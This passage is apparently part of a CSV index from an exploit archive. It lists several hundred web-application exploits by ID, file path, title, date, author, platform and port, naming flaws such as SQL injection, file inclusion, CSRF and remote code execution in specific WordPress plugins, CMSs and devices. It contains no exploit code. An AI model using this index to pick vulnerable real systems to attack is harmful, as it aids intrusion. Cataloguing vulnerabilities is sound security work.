-39246,exploits/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 -39250,exploits/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps, -39251,exploits/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps, -39252,exploits/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps, -39253,exploits/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps, -39254,exploits/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps, -39255,exploits/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps, -39256,exploits/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/treemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps, -39257,exploits/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/zoomabletreemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps, -39261,exploits/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 -39262,exploits/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 -39263,exploits/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 -39266,exploits/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 -39267,exploits/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps, -39268,exploits/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps, -39269,exploits/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' SQL Injection",2014-07-28,Amirh03in,php,webapps, -39270,exploits/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - 'options-general.php' Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps, -39271,exploits/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps, -39272,exploits/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps, -39273,exploits/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",php,webapps, -39279,exploits/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps, -39280,exploits/php/webapps/39280.txt,"WordPress Plugin HDW Player - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps, -39281,exploits/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps, -39282,exploits/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps, -39283,exploits/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps, -39287,exploits/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps, -39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps, -39289,exploits/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps, -39290,exploits/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps, -39291,exploits/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps, -39294,exploits/php/webapps/39294.txt,"Joomla! Component spidervideoplayer - 'theme' SQL Injection",2014-08-26,"Claudio Viviani",php,webapps, -39296,exploits/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps, -39297,exploits/php/webapps/39297.txt,"WordPress Theme Authentic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps, -39298,exploits/php/webapps/39298.txt,"WordPress Theme Epic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps, -39299,exploits/php/webapps/39299.txt,"WordPress Theme Antioch - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps, -39300,exploits/php/webapps/39300.txt,"WordPress Plugin Spider Facebook - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps, -39301,exploits/php/webapps/39301.html,"WordPress Plugin Ninja Forms 2.7.7 - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps, -39302,exploits/php/webapps/39302.html,"WordPress Plugin WP to Twitter - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps, -39303,exploits/php/webapps/39303.txt,"WordPress Plugin Xhanch My Twitter - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps, -39304,exploits/php/webapps/39304.txt,"WordPress Plugin W3 Total Cache - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps, -39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",php,webapps,443 -39309,exploits/php/webapps/39309.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 -39313,exploits/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,php,webapps, -39317,exploits/php/webapps/39317.txt,"WordPress Plugin Wordfence Security - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps, -39319,exploits/php/webapps/39319.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 -39320,exploits/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 -39441,exploits/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 -39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps, -39333,exploits/php/webapps/39333.html,"WordPress Theme Elegance - '/elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps, -39334,exploits/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps, -39335,exploits/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080 -39339,exploits/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 -39341,exploits/php/webapps/39341.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39342,exploits/php/webapps/39342.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39343,exploits/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php?a_country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39344,exploits/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php?affiliate_banner_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39345,exploits/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php?country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39346,exploits/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php?entry_country_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39347,exploits/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39348,exploits/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39349,exploits/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39350,exploits/php/webapps/39350.txt,"Fonality trixbox - 'repo.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39351,exploits/php/webapps/39351.txt,"Fonality trixbox - 'endpointcfg.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps, -39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 -39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 -39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 -39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps, -39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps, -39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80 -39387,exploits/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution",2016-02-01,"Bikramaditya Guha",php,webapps,80 -39391,exploits/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80 -39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,multiple,webapps,80 -39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",multiple,webapps, -39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80 -39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,php,webapps,80 -39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,jsp,webapps,80 -39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,hardware,webapps, -39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps, -39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps, -39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps, -39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 -39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80 -39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80 -39416,exploits/php/webapps/39416.txt,"Symphony CMS 2.6.3 - Multiple SQL Injections",2016-02-04,"Sachin Wagh",php,webapps,80 -39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps, -39419,exploits/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,multiple,webapps, -39420,exploits/php/webapps/39420.txt,"WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39421,exploits/php/webapps/39421.py,"WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39422,exploits/php/webapps/39422.py,"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39423,exploits/php/webapps/39423.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 -39427,exploits/php/webapps/39427.txt,"Employee TimeClock Software 0.99 - SQL Injection",2010-03-10,"Secunia Research",php,webapps, -39435,exploits/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps, -39436,exploits/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 -39448,exploits/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 -39449,exploits/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps, -39450,exploits/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps, -39451,exploits/php/webapps/39451.txt,"WordPress Plugin ALO EasyMail NewsLetter 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 -39453,exploits/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,php,webapps, -39456,exploits/multiple/webapps/39456.rb,"JMX2 Email Tester - 'save_email.php' Arbitrary File Upload",2016-02-17,HaHwul,multiple,webapps, -39459,exploits/php/webapps/39459.txt,"Redaxo 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 -39458,exploits/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps, -39468,exploits/php/webapps/39468.txt,"Vesta Control Panel 0.9.8-15 - Persistent Cross-Site Scripting",2016-02-18,"Necmettin COSKUN",php,webapps, -39469,exploits/php/webapps/39469.txt,"DirectAdmin 1.491 - Cross-Site Request Forgery",2016-02-18,"Necmettin COSKUN",php,webapps, -39473,exploits/php/webapps/39473.txt,"Chamilo LMS IDOR - 'messageId' Delete POST Injection",2016-02-19,Vulnerability-Lab,php,webapps, -39474,exploits/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,php,webapps, -39477,exploits/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500 -39478,exploits/php/webapps/39478.txt,"SOLIDserver < 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps, -39481,exploits/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps, -39485,exploits/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80 -39486,exploits/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps, -39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",json,webapps,8443 -39489,exploits/php/webapps/39489.py,"WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 -39495,exploits/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction",2016-02-25,"Jonathan Broche",windows,webapps, -39497,exploits/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps, -39498,exploits/php/webapps/39498.txt,"WordPress Plugin Ocim MP3 - SQL Injection",2016-02-26,"xevil & Blankon33",php,webapps,80 -39500,exploits/linux/webapps/39500.txt,"Zimbra 8.0.9 GA - Cross-Site Request Forgery",2016-02-26,Sysdream,linux,webapps,443 -39501,exploits/php/webapps/39501.txt,"Centreon 2.5.3 - Remote Command Execution",2016-02-26,Sysdream,php,webapps, -39506,exploits/php/webapps/39506.txt,"Joomla! Component com_poweradmin 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 -39507,exploits/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 -39513,exploits/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 -39521,exploits/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 -39524,exploits/php/webapps/39524.js,"ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps, -39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 -39534,exploits/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 -39536,exploits/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 -39547,exploits/php/webapps/39547.txt,"WordPress Plugin Best Web Soft Captcha 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 -39548,exploits/php/webapps/39548.txt,"WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80 -39552,exploits/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 -39553,exploits/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 -39558,exploits/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 -39559,exploits/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 -39564,exploits/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 -39626,exploits/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80 -39572,exploits/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 -39573,exploits/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps, -39575,exploits/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39576,exploits/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 -39577,exploits/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 -39580,exploits/php/webapps/39580.txt,"Disc ORGanizer (DORG) - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 -39581,exploits/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80 -39582,exploits/php/webapps/39582.txt,"Xoops 2.5.7.2 - Cross-Site Request Forgery (Arbitrary User Deletions)",2016-03-21,hyp3rlinx,php,webapps,80 -39583,exploits/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80 -39584,exploits/php/webapps/39584.txt,"WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80 -39586,exploits/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 -39587,exploits/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 -39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 -39589,exploits/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 -39590,exploits/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 -39591,exploits/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39592,exploits/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - Remote File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39593,exploits/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 -39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 -39621,exploits/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 -39622,exploits/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - Cross-Site Request Forgery",2016-03-27,hyp3rlinx,hardware,webapps,80 -39623,exploits/php/webapps/39623.txt,"WordPress Plugin Photocart Link 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 -39637,exploits/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 -39641,exploits/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)",2016-03-31,LiquidWorm,hardware,webapps,80 -39642,exploits/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 -39646,exploits/php/webapps/39646.py,"WordPress Plugin Advanced Video 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 -40046,exploits/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein & Viktor Minin",php,webapps,80 -39659,exploits/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps, -39664,exploits/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272 -39667,exploits/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80 -39668,exploits/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80 -39672,exploits/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443 -39676,exploits/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 -39677,exploits/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80 -39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 -39679,exploits/php/webapps/39679.txt,"OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 -39968,exploits/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 -39682,exploits/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80 -39683,exploits/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80 -39687,exploits/jsp/webapps/39687.txt,"Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps, -39688,exploits/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 -39691,exploits/jsp/webapps/39691.py,"Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload",2016-04-13,"Zhou Yu",jsp,webapps,8088 -39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",php,webapps,443 -39696,exploits/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80 -39697,exploits/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80 -39701,exploits/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 -39704,exploits/php/webapps/39704.txt,"WordPress Plugin leenk.me 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 -39705,exploits/php/webapps/39705.txt,"WordPress Plugin Kento Post View Counter 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 -39707,exploits/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 -39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 -39710,exploits/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 -39711,exploits/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 -39714,exploits/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 -39715,exploits/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 -39716,exploits/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 -39720,exploits/jsp/webapps/39720.txt,"Totemomail 4.x/5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps, -39721,exploits/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - 